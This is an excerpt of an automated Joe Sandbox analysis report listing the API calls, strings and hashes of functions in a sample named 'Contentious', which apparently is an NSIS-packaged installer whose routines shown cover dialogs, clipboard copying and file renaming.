                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4655cbcf7b26d36f3e2ebc5ad87c617c5547dcba7a914cd385d08a1098ff4efc
                                            • Instruction ID: 00fbac14975189c633ab77c27f4af845d49cfefb772df24da49d8072df64aec2
                                            • Opcode Fuzzy Hash: 4655cbcf7b26d36f3e2ebc5ad87c617c5547dcba7a914cd385d08a1098ff4efc
                                            • Instruction Fuzzy Hash: F9517E74A01228CFCB69DF24D894B9AB7B2BF4A301F5085E9D40EA7250DB759EC5CF50
                                            Function 00405200 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 0040525E
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040526D
                                            • GetClientRect.USER32(?,?), ref: 004052AA
                                            • GetSystemMetrics.USER32(00000002), ref: 004052B1
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004052D2
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004052E3
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004052F6
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405304
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405317
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405339
                                            • ShowWindow.USER32(?,00000008), ref: 0040534D
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040536E
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040537E
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405397
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004053A3
                                            • GetDlgItem.USER32(?,000003F8), ref: 0040527C
                                              • Part of subcall function 0040405C: SendMessageW.USER32(00000028,?,00000001,00403E88), ref: 0040406A
                                            • GetDlgItem.USER32(?,000003EC), ref: 004053C0
                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005194,00000000), ref: 004053CE
                                            • CloseHandle.KERNEL32(00000000), ref: 004053D5
                                            • ShowWindow.USER32(00000000), ref: 004053F9
                                            • ShowWindow.USER32(?,00000008), ref: 004053FE
                                            • ShowWindow.USER32(00000008), ref: 00405448
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040547C
                                            • CreatePopupMenu.USER32 ref: 0040548D
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004054A1
                                            • GetWindowRect.USER32(?,?), ref: 004054C1
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DA
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405512
                                            • OpenClipboard.USER32(00000000), ref: 00405522
                                            • EmptyClipboard.USER32 ref: 00405528
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405534
                                            • GlobalLock.KERNEL32(00000000), ref: 0040553E
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405552
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405572
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040557D
                                            • CloseClipboard.USER32 ref: 00405583
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: {
                                            • API String ID: 590372296-366298937
                                            • Opcode ID: 1501b956c8e834078e8edf25a1dd059a1f0ed5114dda484560ea32a9751d8d4d
                                            • Instruction ID: 1a60e1c93915faf36031e484e8dc4f5f0dc3400a4e98dd575bab4ae93e5693cd
                                            • Opcode Fuzzy Hash: 1501b956c8e834078e8edf25a1dd059a1f0ed5114dda484560ea32a9751d8d4d
                                            • Instruction Fuzzy Hash: 7CB14B71900209FFEB21AF60DD89AAE7B79FB04355F00403AFA05B61A0C7755E52DF69
                                            Function 004037AC Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 216stringregistrylibraryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00406183: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000009), ref: 00406195
                                              • Part of subcall function 00406183: LoadLibraryA.KERNEL32(?,?,00000020,00403242,00000009), ref: 004061A0
                                              • Part of subcall function 00406183: GetProcAddress.KERNEL32(00000000,?), ref: 004061B1
                                            • lstrcatW.KERNEL32(00436000,004226B0), ref: 0040382D
                                            • lstrlenW.KERNEL32(00427160,?,?,?,00427160,00000000,00434800,00436000,004226B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226B0,00000000,00000002,00436800), ref: 004038AD
                                            • lstrcmpiW.KERNEL32(00427158,.exe,00427160,?,?,?,00427160,00000000,00434800,00436000,004226B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226B0,00000000), ref: 004038C0
                                            • GetFileAttributesW.KERNEL32(00427160), ref: 004038CB
                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403914
                                              • Part of subcall function 00405D60: wsprintfW.USER32 ref: 00405D6D
                                            • RegisterClassW.USER32(00428160), ref: 00403951
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403969
                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040399E
                                            • ShowWindow.USER32(00000005,00000000), ref: 004039D4
                                            • LoadLibraryW.KERNEL32(RichEd20), ref: 004039E5
                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 004039F0
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00428160), ref: 00403A00
                                            • GetClassInfoW.USER32(00000000,RichEdit,00428160), ref: 00403A0D
                                            • RegisterClassW.USER32(00428160), ref: 00403A16
                                            • DialogBoxParamW.USER32(?,00000000,00403B4F,00000000), ref: 00403A35
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$`qB$bqB
                                            • API String ID: 914957316-621007215
                                            • Opcode ID: ca6b2e355dc4881ad1daf5d55a366b8e3881b91f83f632729b95c04c92203596
                                            • Instruction ID: 14839756d10fa0731cf70e8e297f409d05a37e9ae1d242a0fae1affd4733ed22
                                            • Opcode Fuzzy Hash: ca6b2e355dc4881ad1daf5d55a366b8e3881b91f83f632729b95c04c92203596
                                            • Instruction Fuzzy Hash: FA61C771604200BEE320AF669D46F3B3A6CEB84745F40457FF941B62E2D7796D12CA2D
                                            Function 004041C4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404262
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404276
                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404293
                                            • GetSysColor.USER32(?), ref: 004042A4
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004042B2
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004042C0
                                            • lstrlenW.KERNEL32(?), ref: 004042C5
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004042D2
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004042E7
                                            • GetDlgItem.USER32(?,0000040A), ref: 00404340
                                            • SendMessageW.USER32(00000000), ref: 00404347
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404372
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004043B5
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004043C3
                                            • SetCursor.USER32(00000000), ref: 004043C6
                                            • ShellExecuteW.SHELL32(0000070B,open,`qB,00000000,00000000,00000001), ref: 004043DB
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004043E7
                                            • SetCursor.USER32(00000000), ref: 004043EA
                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404419
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040442B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: N$`qB$open
                                            • API String ID: 3615053054-3589638645
                                            • Opcode ID: 52352e1598e21c6738b30937b27fb9d187c760a63e9d8340ab691ca5d092bea6
                                            • Instruction ID: 90332823e9378a57a65084aeaf39a46f2e0fe04d3774f3cfafdc0ffa1ca1b148
                                            • Opcode Fuzzy Hash: 52352e1598e21c6738b30937b27fb9d187c760a63e9d8340ab691ca5d092bea6
                                            • Instruction Fuzzy Hash: C87161B1A00209BFDB109F64DD85E6A7B69FB84315F00843AFB05B62D1C778AD51CFA9
                                            Function 00405B37 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrcpyW.KERNEL32(00425D50,NUL), ref: 00405B47
                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405CDB,?,?,00000001,00405853,?,00000000,000000F1,?), ref: 00405B6B
                                            • GetShortPathNameW.KERNEL32(00000000,00425D50,00000400), ref: 00405B74
                                              • Part of subcall function 004059EA: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 004059FA
                                              • Part of subcall function 004059EA: lstrlenA.KERNEL32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A2C
                                            • GetShortPathNameW.KERNEL32(?,00426550,00000400), ref: 00405B91
                                            • wsprintfA.USER32 ref: 00405BAF
                                            • GetFileSize.KERNEL32(00000000,00000000,00426550,C0000000,00000004,00426550,?,?,?,?,?), ref: 00405BEA
                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405BF9
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405C31
                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425950,00000000,-0000000A,00409530,00000000,[Rename],00000000,00000000,00000000), ref: 00405C87
                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405C99
                                            • GlobalFree.KERNEL32(00000000), ref: 00405CA0
                                            • CloseHandle.KERNEL32(00000000), ref: 00405CA7
                                              • Part of subcall function 00405A85: GetFileAttributesW.KERNEL32(00000003,00402DA9,00437800,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00405A89
                                              • Part of subcall function 00405A85: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403455,?), ref: 00405AAB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                            • String ID: %ls=%ls$NUL$P]B$PeB$[Rename]
                                            • API String ID: 1265525490-1712624446
                                            • Opcode ID: 7ff7a2469f7d5d24e043e3ad287c9395a062c9e6d0063eac934db96454873285
                                            • Instruction ID: b9e722bee1e3d5643c0ee6ce27492db21a7ddaf58c344bd4a326e946b13d45f5
                                            • Opcode Fuzzy Hash: 7ff7a2469f7d5d24e043e3ad287c9395a062c9e6d0063eac934db96454873285
                                            • Instruction Fuzzy Hash: 5F410571A08B15BFE2206B619C49F6B3B5CDF45758F14013ABA01F22D2E63CA9018E7D
                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                            Download Yara Rule
                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,004281C0,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 06542edcf82c941fcb0ea04d557428ccb15455088f1b67a948e491e3148a3cff
                                            • Instruction ID: 3444b066cc79e46fd946f20d531651005d710df5863fb735ae49ac58aced53cb
                                            • Opcode Fuzzy Hash: 06542edcf82c941fcb0ea04d557428ccb15455088f1b67a948e491e3148a3cff
                                            • Instruction Fuzzy Hash: 4E418A71804249AFCB058FA5DD459BFBBB9FF48310F00812AF951AA1A0C738EA51DFA5
                                            Function 004044C2 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404511
                                            • SetWindowTextW.USER32(00000000,?), ref: 0040453B
                                            • SHBrowseForFolderW.SHELL32(?), ref: 004045EC
                                            • CoTaskMemFree.OLE32(00000000), ref: 004045F7
                                            • lstrcmpiW.KERNEL32(00427160,004226B0,00000000,?,?), ref: 00404629
                                            • lstrcatW.KERNEL32(?,00427160), ref: 00404635
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404647
                                              • Part of subcall function 004055D9: GetDlgItemTextW.USER32(?,?,00000400,0040467E), ref: 004055EC
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406110
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,?,?,00000000), ref: 0040611F
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406124
                                              • Part of subcall function 004060AD: CharPrevW.USER32(?,?,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033E7), ref: 00406137
                                            • GetDiskFreeSpaceW.KERNEL32(00420680,?,?,0000040F,?,00420680,00420680,?,00000000,00420680,?,?,000003FB,?), ref: 00404709
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404724
                                              • Part of subcall function 0040487D: lstrlenW.KERNEL32(004226B0,004226B0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 0040491E
                                              • Part of subcall function 0040487D: wsprintfW.USER32 ref: 00404927
                                              • Part of subcall function 0040487D: SetDlgItemTextW.USER32(?,004226B0), ref: 0040493A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$`qB
                                            • API String ID: 2624150263-1790975398
                                            • Opcode ID: 1971af5a3371e90a58476a4d9a1bde1db983ec4f734cbdbce4a6dd7cd2fbe865
                                            • Instruction ID: fad5de195099c4bb125bb843149892d88f7ab0b1647696bda0d7f1fd53d0c9ab
                                            • Opcode Fuzzy Hash: 1971af5a3371e90a58476a4d9a1bde1db983ec4f734cbdbce4a6dd7cd2fbe865
                                            • Instruction Fuzzy Hash: 8DA18FB1900208ABDB11AFA5CC45AAF77B8EF85314F10843BF611B62D1D77C9A418B6D
                                            Function 00405E3B Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetVersion.KERNEL32(00000000,00421690,?,004050F8,00421690,00000000,00000000,?), ref: 00405EFE
                                            • GetSystemDirectoryW.KERNEL32(00427160,00000400), ref: 00405F7C
                                            • GetWindowsDirectoryW.KERNEL32(00427160,00000400), ref: 00405F8F
                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405FCB
                                            • SHGetPathFromIDListW.SHELL32(?,00427160), ref: 00405FD9
                                            • CoTaskMemFree.OLE32(?), ref: 00405FE4
                                            • lstrcatW.KERNEL32(00427160,\Microsoft\Internet Explorer\Quick Launch), ref: 00406008
                                            • lstrlenW.KERNEL32(00427160,00000000,00421690,?,004050F8,00421690,00000000,00000000,?), ref: 00406062
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$`qB$`qB
                                            • API String ID: 900638850-2919801942
                                            • Opcode ID: ea28a35ba4a8d75ba921609ce9a01e7390a02607404322f79c31b1ab44bd5171
                                            • Instruction ID: 79069b25519764f594e89cf08704c373f390d163d9a81a8315dba2a423a8323b
                                            • Opcode Fuzzy Hash: ea28a35ba4a8d75ba921609ce9a01e7390a02607404322f79c31b1ab44bd5171
                                            • Instruction Fuzzy Hash: A761E271A40506ABDF208F25DC44AAF37A5EF50314F21803BE946BA2D0D73D8A92CF5E
                                            Function 00402D69 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402D7A
                                            • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,?,00000000,00403455,?), ref: 00402D96
                                              • Part of subcall function 00405A85: GetFileAttributesW.KERNEL32(00000003,00402DA9,00437800,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00405A89
                                              • Part of subcall function 00405A85: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403455,?), ref: 00405AAB
                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003,?,?,?,00000000,00403455,?), ref: 00402DE2
                                            Strings
                                            • soft, xrefs: 00402E57
                                            • h~A, xrefs: 00402DF7
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402F41
                                            • Error launching installer, xrefs: 00402DB9
                                            • Inst, xrefs: 00402E4E
                                            • Null, xrefs: 00402E60
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$h~A$soft
                                            • API String ID: 4283519449-667434385
                                            • Opcode ID: 72d10519aa7813a22122ce2a190531e2113159e5969d5fc00564573f2f7bee58
                                            • Instruction ID: 9f10899fc39ddd59763a437958ebfb3d319deb30ea47bf766ee46431d43f5b69
                                            • Opcode Fuzzy Hash: 72d10519aa7813a22122ce2a190531e2113159e5969d5fc00564573f2f7bee58
                                            • Instruction Fuzzy Hash: 3E51F871940215ABDB209F65DE89BAF7AB4EB44358F14403BF904F62D1C7B88D818BAD
                                            Function 00402FA2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00403003
                                            • GetTickCount.KERNEL32 ref: 00403084
                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004030B1
                                            • wsprintfW.USER32 ref: 004030C4
                                            • WriteFile.KERNEL32(00000000,00000000,?,7FFFFFFF,00000000), ref: 004030F3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: CountTick$FileWritewsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 4209647438-2449383134
                                            • Opcode ID: 3fc94b6413ee6c7b0e72397f3a6e2783545698aac0f8abb10ce49e6bf5ac5f04
                                            • Instruction ID: cf63611a73504a8a14adbad67728b55c0939cb45f31c124ce58839b51082c780
                                            • Opcode Fuzzy Hash: 3fc94b6413ee6c7b0e72397f3a6e2783545698aac0f8abb10ce49e6bf5ac5f04
                                            • Instruction Fuzzy Hash: AE517F3190021AABCF10DF65D944A9F7BACEF08756F10413BE911BB2C1D7389E51CBA9
                                            Function 0040408E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 004040AB
                                            • GetSysColor.USER32(00000000), ref: 004040C7
                                            • SetTextColor.GDI32(?,00000000), ref: 004040D3
                                            • SetBkMode.GDI32(?,?), ref: 004040DF
                                            • GetSysColor.USER32(?), ref: 004040F2
                                            • SetBkColor.GDI32(?,?), ref: 00404102
                                            • DeleteObject.GDI32(?), ref: 0040411C
                                            • CreateBrushIndirect.GDI32(?), ref: 00404126
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                            • Instruction ID: c86db10b712075dc0fdd11195a27afd72c2c4955ef31593f119c7b4a1354f6c1
                                            • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                            • Instruction Fuzzy Hash: 012196B1904744ABCB319F68DD08B4BBBF8AF40714F048629E991F66E0C738E944CB65
